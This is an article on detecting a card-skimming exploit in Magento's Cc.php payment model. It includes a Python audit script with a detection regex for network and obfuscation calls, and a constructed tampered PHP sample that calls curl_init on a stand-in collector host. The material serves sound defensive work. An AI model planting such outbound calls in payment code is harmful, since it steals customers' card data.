There’s no unbreakable protection. Your hosting provider may have great security: firewalls, antivirus, malware protection, etc. But are you sure that your home or office computer is protected well enough, and that your neighbor is an absolutely trusted person? It costs nothing to grab saved passwords, cookies, or RSA keys from a computer and use them to access a secured remote area. Recently, we’ve noticed that some sites were affected by an exploit that sends customers’ credit card numbers to a remote site. It’s worth checking your own site, because you might not even suspect the ‘gremlin’ in your Magento installation.
Most often the exploit affects the Saved Credit Card payment method, but it might be present in any other payment method as well. In this article we’ll explain, as an example, how to ensure that the Saved Credit Card payment method is not hacked; you can follow the same approach to check the payment method used in your store. The malicious code is normally placed in the payment method’s model: [magento_root]/app/code/core/Mage/Payment/Model/Method/Cc.php
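One way to run such a check, as an added example that is not code from the original article: diff the deployed Cc.php against a known-good copy from a clean archive of the same Magento version, and flag added lines that call network or obfuscation functions. The PHP snippets, class name and collector URL below are constructed samples, and the list of flagged functions is an assumption, not taken from the exploit itself.

```python
import difflib
import re

# Calls that should never show up in lines added to a payment model:
# outbound network/mail primitives and common obfuscation wrappers (assumed list).
SUSPICIOUS = re.compile(
    r"(?i)\b(curl_init|curl_exec|fsockopen|stream_socket_client|file_get_contents|"
    r"mail|base64_decode|gzinflate|str_rot13|eval)\s*\("
)

def audit_model(live, pristine):
    """Diff the deployed file against a known-good copy of the same Magento version."""
    report = {"modified": live != pristine, "added": [], "flagged": []}
    live_lines = live.splitlines()
    matcher = difflib.SequenceMatcher(None, pristine.splitlines(), live_lines, autojunk=False)
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag not in ("insert", "replace"):
            continue
        for n in range(j1, j2):
            entry = (n + 1, live_lines[n].strip())  # 1-based line number in the live file
            report["added"].append(entry)
            if SUSPICIOUS.search(entry[1]):
                report["flagged"].append(entry)
    return report

# Constructed stand-in for a pristine model file (not real Magento source).
PRISTINE = """<?php
class Example_Payment_Model_Method_Cc
{
    public function assignData($data)
    {
        $info = $this->getInfoInstance();
        $info->setCcType($data->getCcType());
        return $this;
    }
}
"""

# Constructed tampered copy: two injected lines that open an outbound connection.
TAMPERED = PRISTINE.replace(
    "        return $this;\n",
    "        $ch = curl_init('https://collector.example.invalid/');\n"
    "        curl_exec($ch);\n"
    "        return $this;\n",
)

if __name__ == "__main__":
    for lineno, text in audit_model(TAMPERED, PRISTINE)["flagged"]:
        print(f"line {lineno}: {text}")
```

In practice, read both files from disk and pass their contents to `audit_model`. Any entry in `added` deserves review even when nothing is flagged, because a core file should not differ from the release archive.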